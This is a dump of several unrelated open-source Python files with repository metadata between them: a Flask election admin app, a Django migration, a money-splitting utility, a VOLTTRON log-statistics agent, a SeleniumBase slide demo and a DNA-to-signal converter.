sequence_dicts = sequence.dicts()
time = 0
for slide in sequence:
time += slide.slide.time_on_screen
for slide_dict in sequence_dicts:
for slide in sequence:
if slide.slide.slug == slide_dict['slide']:
slide_dict['name'] = slide.slide.name
slide_dict['time_on_screen'] = slide.slide.time_on_screen
if slide_dict['slide'].startswith('tumblr'):
slide_dict['news_item'] = True
context.update({
'sequence': sequence_dicts,
'slides': Slide.select().dicts(),
'graphics': Slide.select().where(fn.Lower(fn.Substr(Slide.slug, 1, 6)) != 'tumblr').order_by(Slide.slug).dicts(),
'news': Slide.select().where(fn.Lower(fn.Substr(Slide.slug, 1, 6)) == 'tumblr').order_by(Slide.slug.desc()).dicts(),
'time': time,
})
return render_template('admin/stack.html', **context)
@app.route('/%s/admin/stack/save' % app_config.PROJECT_SLUG, methods=['POST'])
def save_stack():
"""
Save new stack sequence.
"""
from flask import request
data = request.json
SlideSequence.delete().execute()
# Rebuild sequence table
for i, row in enumerate(data[0]):
SlideSequence.create(order=i, slide=row['slide'])
stack.deploy()
return "Saved sequence"
@app.route('/%s/admin/chamber/<chamber>/' % app_config.PROJECT_SLUG, methods=['GET'])
def chamber(chamber):
"""
Read/update list of chamber candidates.
"""
chamber_slug = 'H'
if chamber == 'senate':
chamber_slug = 'S'
elif chamber == 'governor':
chamber_slug = 'G'
races = Race.select().where(Race.office_id == chamber_slug).order_by(Race.state_postal, Race.seat_number)
context = make_context(asset_depth=1)
context.update({
'races': races,
'chamber': chamber,
})
return render_template('admin/chamber.html', **context)
@app.route('/%s/admin/chamber/<chamber>/call/' % app_config.PROJECT_SLUG, methods=['POST'])
def chamber_call(chamber):
from flask import request
race_slug = request.form.get('race_slug', None)
race = Race.get(Race.slug == race_slug)
# Toggling accept AP call
accept_ap_call = request.form.get('accept_ap_call', None)
if accept_ap_call != None:
if accept_ap_call.lower() == 'true':
accept_ap_call = True
else:
accept_ap_call = False
if race_slug != None and accept_ap_call != None:
race.accept_ap_call = accept_ap_call
race.save()
if accept_ap_call == True:
Candidate.update(npr_winner=False).where(Candidate.race == race).execute()
# Setting NPR winner
first_name = request.form.get('first_name', None)
last_name = request.form.get('last_name', None)
clear_all = request.form.get('clear_all', None)
if race_slug != None and clear_all != None:
if clear_all == 'true':
Candidate.update(npr_winner=False).where(Candidate.race == race).execute()
race.npr_called = False
race.save()
if race_slug != None and first_name != None and last_name != None:
Candidate.update(npr_winner=False).where(Candidate.race == race).execute()
Candidate.update(npr_winner=True).where(
Candidate.race == race,
Candidate.first_name == first_name,
Candidate.last_name == last_name
).execute()
race.npr_called = True
if race.accept_ap_call == False:
if race.npr_called_time == None:
race.npr_called_time = datetime.datetime.utcnow()
race.save()
return 'Success'
# Boilerplate
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--port')
args = parser.parse_args()
server_port = 8080
if args.port:
server_port = int(args.port)
app.run(host='0.0.0.0', port=server_port, debug=app_config.DEBUG)
| 29.321053 | 125 | 0.666846 |
76cd569bad8ab91584a795c6a542aba65b1ac9a2 | 1,775 | py | Python | core/migrations/0002_auto_20190606_0041.py | MubongwoNdasi/pms | 0cc5dcbc25b31e13631672e1a03c88e2ad46bc92 | [
"MIT"
] | null | null | null | core/migrations/0002_auto_20190606_0041.py | MubongwoNdasi/pms | 0cc5dcbc25b31e13631672e1a03c88e2ad46bc92 | [
"MIT"
] | 8 | 2021-03-18T22:27:44.000Z | 2022-02-10T09:18:50.000Z | core/migrations/0002_auto_20190606_0041.py | MubongwoNdasi/pms | 0cc5dcbc25b31e13631672e1a03c88e2ad46bc92 | [
"MIT"
] | 1 | 2021-09-20T06:37:41.000Z | 2021-09-20T06:37:41.000Z | # Generated by Django 2.2 on 2019-06-06 00:41
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('core', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='city',
name='created_on',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='added on'),
preserve_default=False,
),
migrations.AddField(
model_name='city',
name='updated_on',
field=models.DateTimeField(auto_now=True, verbose_name='updated on'),
),
migrations.AddField(
model_name='pharmacy',
name='created_on',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='added on'),
preserve_default=False,
),
migrations.AddField(
model_name='pharmacy',
name='updated_on',
field=models.DateTimeField(auto_now=True, verbose_name='updated on'),
),
migrations.AddField(
model_name='pharmacyuser',
name='updated_on',
field=models.DateTimeField(auto_now=True, verbose_name='updated on'),
),
migrations.AddField(
model_name='profile',
name='created_on',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='added on'),
preserve_default=False,
),
migrations.AddField(
model_name='profile',
name='updated_on',
field=models.DateTimeField(auto_now=True, verbose_name='updated on'),
),
]
| 33.490566 | 118 | 0.59831 |
8cb365ec060514af9641d7684391a9a21a75c0d6 | 2,089 | py | Python | hordak/utilities/money.py | PetrDlouhy/django-hordak | 71c141928c5a2cc102bcfd710d7bdf17093933c9 | [
"MIT"
] | 2 | 2016-09-05T08:58:53.000Z | 2016-09-26T10:49:07.000Z | hordak/utilities/money.py | PetrDlouhy/django-hordak | 71c141928c5a2cc102bcfd710d7bdf17093933c9 | [
"MIT"
] | 3 | 2016-11-06T13:14:29.000Z | 2016-11-06T13:57:58.000Z | hordak/utilities/money.py | waldocollective/django-hordak | dc9b8e5008954ca0f4b089d89348e7dec4301f65 | [
"MIT"
] | null | null | null | from decimal import Decimal
from hordak.defaults import DECIMAL_PLACES
def ratio_split(amount, ratios):
"""Split in_value according to the ratios specified in `ratios`
This is special in that it ensures the returned values always sum to
in_value (i.e. we avoid losses or gains due to rounding errors). As a
result, this method returns a list of `Decimal` values with length equal
to that of `ratios`.
Examples:
.. code-block:: python
>>> from hordak.utilities.money import ratio_split
>>> from decimal import Decimal
>>> ratio_split(Decimal('10'), [Decimal('1'), Decimal('2')])
[Decimal('3.33'), Decimal('6.67')]
Note the returned values sum to the original input of ``10``. If we were to
do this calculation in a naive fashion then the returned values would likely
be ``3.33`` and ``6.66``, which would sum to ``9.99``, thereby loosing
``0.01``.
Args:
amount (Decimal): The amount to be split
ratios (list[Decimal]): The ratios that will determine the split
Returns: list(Decimal)
"""
precision = Decimal(10) ** Decimal(-DECIMAL_PLACES)
assert amount == amount.quantize(precision)
# Distribute the amount according to the ratios:
ratio_total = sum(ratios)
values = [amount * ratio / ratio_total for ratio in ratios]
# Now round the values to the desired number of decimal places:
rounded = [v.quantize(precision) for v in values]
# The rounded values may not add up to the exact amount.
# Use the Largest Remainder algorithm to distribute the
# difference between participants with non-zero ratios:
participants = [i for i in range(len(ratios)) if ratios[i] != Decimal(0)]
for p in sorted(participants, key=lambda i: rounded[i] - values[i]):
total = sum(rounded)
if total < amount:
rounded[p] += precision
elif total > amount:
rounded[p] -= precision
else:
break
assert sum(rounded) == amount
return rounded
| 34.245902 | 84 | 0.646721 |
086d6848084d97850897bbe6d6c6676fd8676882 | 13,044 | py | Python | tests/time_tests/test_runner/conftest.py | maksimvlasov/openvino | be8600af38dd6ab39422b3db496c0fb73c156938 | [
"Apache-2.0"
] | 1 | 2021-07-14T07:20:24.000Z | 2021-07-14T07:20:24.000Z | tests/time_tests/test_runner/conftest.py | maksimvlasov/openvino | be8600af38dd6ab39422b3db496c0fb73c156938 | [
"Apache-2.0"
] | 35 | 2020-11-13T16:32:58.000Z | 2022-03-12T15:05:16.000Z | tests/time_tests/test_runner/conftest.py | sungeunk/openvino | c55291d62fced468570d15594738a7db6ef31c9d | [
"Apache-2.0"
] | 1 | 2021-01-21T12:09:13.000Z | 2021-01-21T12:09:13.000Z | # Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
#
"""
Basic high-level plugin file for pytest.
See [Writing plugins](https://docs.pytest.org/en/latest/writing_plugins.html)
for more information.
This plugin adds the following command-line options:
* `--test_conf` - Path to test configuration file. Used to parametrize tests.
Format: YAML file.
* `--exe` - Path to a timetest binary to execute.
* `--niter` - Number of times to run executable.
"""
import hashlib
import json
import logging
# pylint:disable=import-error
import os
import shutil
import sys
import tempfile
from pathlib import Path
import pytest
import yaml
from jsonschema import validate, ValidationError
# add utils folder to imports
UTILS_DIR = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))), "utils")
sys.path.insert(0, str(UTILS_DIR))
from path_utils import check_positive_int
from platform_utils import get_os_name, get_os_version, get_cpu_info
from utils import upload_data, metadata_from_manifest, DB_COLLECTIONS
# -------------------- CLI options --------------------
def pytest_addoption(parser):
"""Specify command-line options for all plugins"""
test_args_parser = parser.getgroup("timetest test run")
test_args_parser.addoption(
"--test_conf",
type=Path,
help="path to a test config",
default=Path(__file__).parent / "test_config.yml"
)
test_args_parser.addoption(
"--exe",
required=True,
dest="executable",
type=Path,
help="path to a timetest binary to execute"
)
test_args_parser.addoption(
"--niter",
type=check_positive_int,
help="number of iterations to run executable and aggregate results",
default=3
)
db_args_parser = parser.getgroup("timetest database use")
db_args_parser.addoption(
'--db_submit',
metavar="RUN_ID",
type=str,
help='submit results to the database. ' \
'`RUN_ID` should be a string uniquely identifying the run' \
' (like Jenkins URL or time)'
)
is_db_used = db_args_parser.parser.parse_known_args(sys.argv).db_submit
db_args_parser.addoption(
'--db_url',
type=str,
required=is_db_used,
help='MongoDB URL in a form "mongodb://server:port"'
)
db_args_parser.addoption(
'--db_collection',
type=str,
required=is_db_used,
help='collection name in database',
choices=DB_COLLECTIONS
)
db_args_parser.addoption(
'--db_metadata',
type=str,
default=None,
help='path to JSON-formatted file to extract additional information')
db_args_parser.addoption(
'--manifest',
type=Path,
required=is_db_used,
help='path to build manifest to extract commit information')
@pytest.fixture(scope="session")
def test_conf(request):
"""Fixture function for command-line option."""
return request.config.getoption('test_conf')
@pytest.fixture(scope="session")
def executable(request):
"""Fixture function for command-line option."""
return request.config.getoption('executable')
@pytest.fixture(scope="session")
def niter(request):
"""Fixture function for command-line option."""
return request.config.getoption('niter')
# -------------------- CLI options --------------------
@pytest.fixture(scope="function")
def temp_dir(pytestconfig):
"""Create temporary directory for test purposes.
It will be cleaned up after every test run.
"""
temp_dir = tempfile.TemporaryDirectory()
yield Path(temp_dir.name)
temp_dir.cleanup()
@pytest.fixture(scope="function")
def cl_cache_dir(pytestconfig, instance):
"""Generate directory to save OpenCL cache before test run and clean up after run.
Folder `cl_cache` should be created in a directory where tests were run. In this case
cache will be saved correctly. This behaviour is OS independent.
More: https://github.com/intel/compute-runtime/blob/master/opencl/doc/FAQ.md#how-can-cl_cache-be-enabled
"""
if instance["device"]["name"] == "GPU":
cl_cache_dir = pytestconfig.invocation_dir / "cl_cache"
# if cl_cache generation to a local `cl_cache` folder doesn't work, specify
# `cl_cache_dir` environment variable in an attempt to fix it (Linux specific)
os.environ["cl_cache_dir"] = str(cl_cache_dir)
if cl_cache_dir.exists():
shutil.rmtree(cl_cache_dir)
cl_cache_dir.mkdir()
logging.info("cl_cache will be created in {}".format(cl_cache_dir))
yield cl_cache_dir
shutil.rmtree(cl_cache_dir)
else:
yield None
@pytest.fixture(scope="function")
def model_cache_dir(pytestconfig, instance):
"""
Generate directory to IE model cache before test run and clean up after run.
"""
if instance.get("use_model_cache"):
model_cache_dir = pytestconfig.invocation_dir / "models_cache"
if model_cache_dir.exists():
shutil.rmtree(model_cache_dir)
model_cache_dir.mkdir()
logging.info("model_cache will be created in {}".format(model_cache_dir))
yield model_cache_dir
shutil.rmtree(model_cache_dir)
else:
yield None
@pytest.fixture(scope="function")
def test_info(request, pytestconfig):
"""Fixture for collecting timetests information.
Current fixture fills in `request` and `pytestconfig` global
fixtures with timetests information which will be used for
internal purposes.
"""
setattr(request.node._request, "test_info", {"results": {},
"raw_results": {},
"db_info": {}})
yield request.node._request.test_info
@pytest.fixture(scope="function")
def validate_test_case(request, test_info):
"""Fixture for validating test case on correctness.
Fixture checks current test case contains all fields required for
a correct work.
"""
schema = """
{
"type": "object",
"properties": {
"device": {
"type": "object",
"properties": {
"name": {"type": "string"}
},
"required": ["name"]
},
"model": {
"type": "object",
"properties": {
"path": {"type": "string"}
},
"required": ["path"]
}
},
"required": ["device", "model"],
"additionalProperties": true
}
"""
schema = json.loads(schema)
try:
validate(instance=request.node.funcargs["instance"], schema=schema)
except ValidationError:
request.config.option.db_submit = False
raise
yield
@pytest.fixture(scope="function")
def prepare_db_info(request, test_info, executable, niter, manifest_metadata):
"""Fixture for preparing and validating data to submit to a database.
Fixture prepares data and metadata to submit to a database. One of the steps
is parsing of build information from build manifest. After preparation,
it checks if data contains required properties.
"""
FIELDS_FOR_ID = ['run_id', 'timetest', 'model', 'device', 'niter']
run_id = request.config.getoption("db_submit")
if not run_id:
yield
return
# add db_metadata
db_meta_path = request.config.getoption("db_metadata")
if db_meta_path:
with open(db_meta_path, "r") as db_meta_f:
test_info["db_info"].update(json.load(db_meta_f))
# add test info
info = {
# results will be added immediately before uploading to DB in `pytest_runtest_makereport`
"run_id": run_id,
"timetest": str(executable.stem),
"model": request.node.funcargs["instance"]["model"],
"device": request.node.funcargs["instance"]["device"],
"niter": niter,
"test_name": request.node.name,
"os": "_".join([str(item) for item in [get_os_name(), *get_os_version()]])
}
info['_id'] = hashlib.sha256(
''.join([str(info[key]) for key in FIELDS_FOR_ID]).encode()).hexdigest()
test_info["db_info"].update(info)
# add manifest metadata
test_info["db_info"].update(manifest_metadata)
# validate db_info
schema = """
{
"type": "object",
"properties": {
"device": {
"type": "object",
"properties": {
"name": {"type": "string"}
},
"required": ["name"]
},
"model": {
"type": "object",
"properties": {
"path": {"type": "string"},
"name": {"type": "string"},
"precision": {"type": "string"},
"framework": {"type": "string"}
},
"required": ["path", "name", "precision", "framework"]
},
"run_id": {"type": "string"},
"timetest": {"type": "string"},
"niter": {"type": "integer"},
"test_name": {"type": "string"},
"results": {"type": "object"},
"os": {"type": "string"},
"_id": {"type": "string"}
},
"required": ["device", "model", "run_id", "timetest", "niter", "test_name", "os", "_id"],
"additionalProperties": true
}
"""
schema = json.loads(schema)
try:
validate(instance=test_info["db_info"], schema=schema)
except ValidationError:
request.config.option.db_submit = False
raise
yield
@pytest.fixture(scope="session", autouse=True)
def manifest_metadata(request):
"""Fixture function for command-line option."""
run_id = request.config.getoption("db_submit")
if not run_id:
yield
return
manifest_meta = metadata_from_manifest(request.config.getoption("manifest"))
schema = """
{
"type": "object",
"properties": {
"product_type": {"enum": ["private_linux_ubuntu_18_04", "private_windows_vs2019"]},
"repo_url": {"type": "string"},
"commit_sha": {"type": "string"},
"commit_date": {"type": "string"},
"branch": {"type": "string"},
"target_branch": {"type": "string"},
"version": {"type": "string"}
},
"required": ["product_type", "repo_url", "commit_sha", "commit_date", "branch", "target_branch", "version"],
"additionalProperties": false
}
"""
schema = json.loads(schema)
try:
validate(instance=manifest_meta, schema=schema)
except ValidationError:
request.config.option.db_submit = False
raise
yield manifest_meta
def pytest_generate_tests(metafunc):
"""Pytest hook for test generation.
Generate parameterized tests from discovered modules and test config
parameters.
"""
with open(metafunc.config.getoption('test_conf'), "r") as file:
test_cases = yaml.safe_load(file)
if test_cases:
metafunc.parametrize("instance", test_cases)
def pytest_make_parametrize_id(config, val, argname):
"""Pytest hook for user-friendly test name representation"""
def get_dict_values(d):
"""Unwrap dictionary to get all values of nested dictionaries"""
if isinstance(d, dict):
for v in d.values():
yield from get_dict_values(v)
else:
yield d
keys = ["device", "model"]
values = {key: val[key] for key in keys}
values = list(get_dict_values(values))
return "-".join(["_".join([key, str(val)]) for key, val in zip(keys, values)])
@pytest.mark.hookwrapper
def pytest_runtest_makereport(item, call):
"""Pytest hook for report preparation.
Submit tests' data to a database.
"""
run_id = item.config.getoption("db_submit")
if not run_id:
yield
return
data = item._request.test_info["db_info"].copy()
data["results"] = item._request.test_info["results"].copy()
data["raw_results"] = item._request.test_info["raw_results"].copy()
data["cpu_info"] = get_cpu_info()
data["status"] = "not_finished"
data["error_msg"] = ""
report = (yield).get_result()
if call.when in ["setup", "call"]:
if call.when == "call":
if not report.passed:
data["status"] = "failed"
data["error_msg"] = report.longrepr.reprcrash.message
else:
data["status"] = "passed"
db_url = item.config.getoption("db_url")
db_collection = item.config.getoption("db_collection")
logging.info("Upload data to {}/{}.{}. Data: {}".format(db_url, 'timetests', db_collection, data))
upload_data(data, db_url, 'timetests', db_collection)
| 32.773869 | 120 | 0.605259 |
71e45913a166035d9487fd3d45450c75b60c96ae | 6,753 | py | Python | services/ops/LogStatisticsAgent/logstatisticsagent/agent.py | cloudcomputingabc/volttron | 6495e26e3185a7af8d0d79ad2586bdf8ea83992d | [
"Apache-2.0",
"BSD-2-Clause"
] | 406 | 2015-01-20T03:08:53.000Z | 2022-03-31T20:59:07.000Z | services/ops/LogStatisticsAgent/logstatisticsagent/agent.py | cloudcomputingabc/volttron | 6495e26e3185a7af8d0d79ad2586bdf8ea83992d | [
"Apache-2.0",
"BSD-2-Clause"
] | 2,031 | 2015-01-05T21:35:45.000Z | 2022-03-29T21:44:36.000Z | services/ops/LogStatisticsAgent/logstatisticsagent/agent.py | cloudcomputingabc/volttron | 6495e26e3185a7af8d0d79ad2586bdf8ea83992d | [
"Apache-2.0",
"BSD-2-Clause"
] | 219 | 2015-01-20T14:53:57.000Z | 2022-03-06T00:37:41.000Z | # -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
#
# Copyright 2020, Battelle Memorial Institute.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This material was prepared as an account of work sponsored by an agency of
# the United States Government. Neither the United States Government nor the
# United States Department of Energy, nor Battelle, nor any of their
# employees, nor any jurisdiction or organization that has cooperated in the
# development of these materials, makes any warranty, express or
# implied, or assumes any legal liability or responsibility for the accuracy,
# completeness, or usefulness or any information, apparatus, product,
# software, or process disclosed, or represents that its use would not infringe
# privately owned rights. Reference herein to any specific commercial product,
# process, or service by trade name, trademark, manufacturer, or otherwise
# does not necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors expressed
# herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY operated by
# BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
import datetime
import logging
import os
import sys
import statistics
from volttron.platform.vip.agent import Agent, RPC, Core
from volttron.platform.agent import utils
from volttron.platform.agent.utils import get_aware_utc_now
utils.setup_logging()
_log = logging.getLogger(__name__)
__version__ = '1.0'
def log_statistics(config_path, **kwargs):
"""
Load the LogStatisticsAgent agent configuration and returns and instance
of the agent created using that configuration.
:param config_path: Path to a configuration file.
:type config_path: str
:returns: LogStatisticsAgent agent instance
:rtype: LogStatisticsAgent agent
"""
config = utils.load_config(config_path)
return LogStatisticsAgent(config, **kwargs)
class LogStatisticsAgent(Agent):
"""
LogStatisticsAgent reads volttron.log file size every hour, compute the size delta from previous hour and publish
the difference with timestamp. It also publishes standard deviation every 24 hours.
:param config: Configuration dict
:type config: dict
Example configuration:
.. code-block:: python
{
"file_path" : "/home/volttron/volttron.log",
"analysis_interval_sec" : 60,
"publish_topic" : "platform/log_statistics",
"historian_topic" : "analysis/log_statistics"
}
"""
def __init__(self, config, **kwargs):
super(LogStatisticsAgent, self).__init__(**kwargs)
self.analysis_interval_sec = config["analysis_interval_sec"]
self.file_path = config["file_path"]
self.publish_topic = config["publish_topic"]
self.historian_topic = config["historian_topic"]
self.size_delta_list = []
self.file_start_size = None
self.prev_file_size = None
self._scheduled_event = None
@Core.receiver('onstart')
def starting(self, sender, **kwargs):
_log.info("Starting " + self.__class__.__name__ + " agent")
self.publish_analysis()
def publish_analysis(self):
"""
Publishes file's size increment in previous time interval (60 minutes) with timestamp.
Also publishes standard deviation of file's hourly size differences every 24 hour.
"""
if self._scheduled_event is not None:
self._scheduled_event.cancel()
if self.prev_file_size is None:
self.prev_file_size = self.get_file_size()
_log.debug("init_file_size = {}".format(self.prev_file_size))
else:
# read file size
curr_file_size = self.get_file_size()
# calculate size delta
size_delta = curr_file_size - self.prev_file_size
self.prev_file_size = curr_file_size
self.size_delta_list.append(size_delta)
headers = {'Date': datetime.datetime.utcnow().isoformat() + 'Z'}
publish_message = {'timestamp': datetime.datetime.utcnow().isoformat() + 'Z',
'log_size_delta': size_delta}
historian_message = [{"log_size_delta ": size_delta},
{"log_size_delta ": {'units': 'bytes', 'tz': 'UTC', 'type': 'float'}}]
if len(self.size_delta_list) == 24:
standard_deviation = statistics.stdev(self.size_delta_list)
publish_message['log_std_dev'] = standard_deviation
historian_message[0]['log_std_dev'] = standard_deviation
historian_message[1]['log_std_dev'] = {'units': 'bytes', 'tz': 'UTC', 'type': 'float'}
_log.debug('publishing message {} with header {} on historian topic {}'
.format(historian_message, headers, self.historian_topic))
self.vip.pubsub.publish(peer="pubsub", topic=self.historian_topic, headers=headers,
message=historian_message)
self.size_delta_list = []
_log.debug('publishing message {} on topic {}'.format(publish_message, self.publish_topic))
self.vip.pubsub.publish(peer="pubsub", topic=self.publish_topic, message=publish_message)
_log.debug('Scheduling next periodic call')
now = get_aware_utc_now()
next_update_time = now + datetime.timedelta(seconds=self.analysis_interval_sec)
self._scheduled_event = self.core.schedule(next_update_time, self.publish_analysis)
def get_file_size(self):
try:
return os.path.getsize(self.file_path)
except OSError as e:
_log.error(e)
def main(argv=sys.argv):
"""
Main method called by the platform.
"""
utils.vip_main(log_statistics, identity='platform.logstatisticsagent')
if __name__ == '__main__':
# Entry point for script
try:
sys.exit(main())
except KeyboardInterrupt:
pass
| 39.95858 | 117 | 0.685473 |
ceacce6a356457dd0ca92b5e60fabae47f015271 | 6,318 | py | Python | examples/presenter/my_presentation.py | mdmintz/seleniumspot | f5c225aa4fcd0b4124fc990e3892c36736290ce8 | [
"MIT"
] | 2,745 | 2016-07-20T09:13:15.000Z | 2022-03-29T15:07:31.000Z | examples/presenter/my_presentation.py | mdmintz/seleniumspot | f5c225aa4fcd0b4124fc990e3892c36736290ce8 | [
"MIT"
] | 384 | 2016-07-17T20:45:26.000Z | 2022-03-31T22:35:35.000Z | examples/presenter/my_presentation.py | mdmintz/seleniumspot | f5c225aa4fcd0b4124fc990e3892c36736290ce8 | [
"MIT"
] | 704 | 2016-07-17T20:47:04.000Z | 2022-03-31T04:32:35.000Z | from seleniumbase import BaseCase
class MyPresenterClass(BaseCase):
def test_presenter(self):
self.create_presentation(theme="serif", transition="none")
self.add_slide(
"<h1>Welcome</h1><br />\n" "<h3>Press the <b>Right Arrow</b></h3>"
)
self.add_slide(
"<h3>SeleniumBase Presenter</h3><br />\n"
'<img width="240" src="https://seleniumbase.io/img/logo3a.png" />'
'<span style="margin:144px;" />'
'<img src="https://seleniumbase.io/other/python_3d_logo.png" />'
"<br /><br />\n<h4>Create presentations with <b>Python</b></h4>"
)
self.add_slide(
"<h3>Make slides using <b>HTML</b>:</h3><br />\n"
'<table style="padding:10px;border:4px solid black;font-size:50;">'
'\n<tr style="background-color:CDFFFF;">\n'
"<th>Row ABC</th><th>Row XYZ</th></tr>\n"
'<tr style="background-color:DCFDDC;">'
"<td>Value ONE</td><td>Value TWO</td></tr>\n"
'<tr style="background-color:DFDFFB;">\n'
"<td>Value THREE</td><td>Value FOUR</td></tr>\n"
"</table><br />\n<h4>(HTML <b>table</b> example)</h4>"
)
self.add_slide(
"<h3>Keyboard Shortcuts:</h3>\n"
'<table style="padding:10px;border:4px solid black;font-size:30;'
'background-color:FFFFDD;">\n'
"<tr><th>Key</th><th>Action</th></tr>\n"
"<tr><td><b>=></b></td><td>Next Slide (N also works)</td></tr>\n"
"<tr><td><b><=</b></td><td>Previous Slide (P also works)</td></tr>"
"\n<tr><td>F</td><td>Full Screen Mode</td></tr>\n"
"<tr><td>O</td><td>Overview Mode Toggle</td></tr>\n"
"<tr><td>esc</td><td>Exit Full Screen / Overview Mode</td></tr>\n"
"<tr><td><b>.</b></td><td>Pause/Resume Toggle</td></tr>\n"
"<tr><td>space</td><td>Next Slide (alternative)</td></tr></table>"
)
self.add_slide(
"<h3>Add <b>images</b> to slides:</h3>",
image="https://seleniumbase.io/other/seagulls.jpg",
)
self.add_slide(
"<h3>Add <b>code</b> to slides:</h3>",
code=(
"from seleniumbase import BaseCase\n\n"
"class MyTestClass(BaseCase):\n\n"
" def test_basics(self):\n"
' self.open("https://store.xkcd.com/search")\n'
' self.type(\'input[name="q"]\', "xkcd book\\n")\n'
' self.assert_text("xkcd: volume 0", "h3")\n'
' self.open("https://xkcd.com/353/")\n'
' self.assert_title("xkcd: Python")\n'
" self.assert_element('img[alt=\"Python\"]')\n"
" self.click('a[rel=\"license\"]')\n"
' self.assert_text("free to copy and reuse")\n'
" self.go_back()\n"
' self.click_link("About")\n'
' self.assert_exact_text("xkcd.com", "h2")'
),
)
self.add_slide(
"<h3>Highlight <b>code</b> in slides:</h3>",
code=(
"from seleniumbase import BaseCase\n\n"
"<mark>class MyTestClass(BaseCase):</mark>\n\n"
" def test_basics(self):\n"
' self.open("https://store.xkcd.com/search")\n'
' self.type(\'input[name="q"]\', "xkcd book\\n")\n'
' self.assert_text("xkcd: volume 0", "h3")'
),
)
self.add_slide(
"<h3>Add <b>iFrames</b> to slides:</h3>",
iframe="https://seleniumbase.io/demo_page",
)
self.add_slide(
"<h3>Getting started is <b>easy</b>:</h3>",
code=(
"from seleniumbase import BaseCase\n\n"
"class MyPresenterClass(BaseCase):\n\n"
" def test_presenter(self):\n"
' self.create_presentation(theme="serif")\n'
' self.add_slide("Welcome to Presenter!")\n'
" self.add_slide(\n"
' "Add code to slides:",\n'
" code=(\n"
' "from seleniumbase import BaseCase\\n\\n"\n'
' "class MyPresenterClass(BaseCase):\\n\\n"\n'
' " def test_presenter(self):\\n"\n'
' " self.create_presentation()\\n"))\n'
" self.begin_presentation(\n"
' filename="demo.html", show_notes=True)'
),
)
self.add_slide(
"<h3>Include <b>notes</b> with slides:</h3><br />",
code=(
'self.add_slide("[Your HTML goes here]",\n'
' code="[Your software code goes here]",\n'
' content2="[Additional HTML goes here]",\n'
' notes="[Attached speaker notes go here]"\n'
' "[Note A! -- Note B! -- Note C! ]")'
),
notes="<h2><ul><li>Note A!<li>Note B!<li>Note C!<li>Note D!</h2>",
content2="<h4>(Notes can include HTML tags)</h4>",
)
self.add_slide(
"<h3>Multiple <b>themes</b> available:</h3>",
code=(
'self.create_presentation(theme="serif")\n\n'
'self.create_presentation(theme="sky")\n\n'
'self.create_presentation(theme="simple")\n\n'
'self.create_presentation(theme="white")\n\n'
'self.create_presentation(theme="moon")\n\n'
'self.create_presentation(theme="black")\n\n'
'self.create_presentation(theme="night")\n\n'
'self.create_presentation(theme="beige")\n\n'
'self.create_presentation(theme="league")'
),
)
self.add_slide(
"<h2><b>The End</b></h2>",
image="https://seleniumbase.io/img/sb_logo_10.png",
)
self.begin_presentation(
filename="presenter.html", show_notes=True, interval=0
)
| 48.229008 | 79 | 0.466129 |
35dd40fc28ff605b93136a6aa4fd8514d5d8f5a1 | 9,738 | py | Python | src/utils/gene_to_signal.py | ithihasmadala/gene-to-signal | 96efc1253604c0b5b46a0643e10bd1f0c9a7801c | [
"MIT"
] | null | null | null | src/utils/gene_to_signal.py | ithihasmadala/gene-to-signal | 96efc1253604c0b5b46a0643e10bd1f0c9a7801c | [
"MIT"
] | null | null | null | src/utils/gene_to_signal.py | ithihasmadala/gene-to-signal | 96efc1253604c0b5b46a0643e10bd1f0c9a7801c | [
"MIT"
] | null | null | null |
# *Import packages
from os import error
import math
import csv
import sys
# !Specify the type of representation you want the DNA sequence to be converted into. Choose from: ['Voss', 'Tetrahedron', 'Integer', 'Real', 'Complex']. Default = 'Voss'
# *This is the only variable that needs to be set in this script.
metric = 'Voss'
# !Functions
# *Function to make a list out of the gene sequence. Outputs a list from a string input.
def split(gene):
return [base for base in gene]
# *Function to flatten nested lists into list. Outputs a linear list from a nested list input.
def merge(nuclist):
lis = []
for el in sum(nuclist, []):
lis.append(el)
return lis
# *Funtion to change sequences to signals. Inputs a seq (string) and type(string) of representation and outputs a list of DNA signal.
def DNAtoSignal(seq, type):
# *Splitting the seq string into a seq list."
baselist = split(seq)
# *Voss Representation. (signal[0], signal[1], signal[2], signal[3]) ~ (A, G, T, C) respectively.
if (type == "Voss"):
# *Output list called signal.
signal = [[],[],[],[]]
for base in baselist:
if base == 'C' or base == 'c':
signal[3].append(1)
signal[1].append(0)
signal[0].append(0)
signal[2].append(0)
elif base == 'G' or base == 'g':
signal[3].append(0)
signal[1].append(1)
signal[0].append(0)
signal[2].append(0)
elif base == 'A' or base == 'a':
signal[3].append(0)
signal[1].append(0)
signal[0].append(1)
signal[2].append(0)
elif base == 'T' or base == 't':
signal[3].append(0)
signal[1].append(0)
signal[0].append(0)
signal[2].append(1)
elif base == 'U' or base == 'u':
signal[3].append(0)
signal[1].append(0)
signal[0].append(0)
signal[2].append(1)
elif base == 'R' or base == 'r':
signal[3].append(0)
signal[1].append(1)
signal[0].append(1)
signal[2].append(0)
elif base == 'Y' or base == 'y':
signal[3].append(1)
signal[1].append(0)
signal[0].append(0)
signal[2].append(1)
elif base == 'K' or base == 'k':
signal[3].append(0)
signal[1].append(1)
signal[0].append(0)
signal[2].append(1)
elif base == 'M' or base == 'm':
signal[3].append(1)
signal[1].append(0)
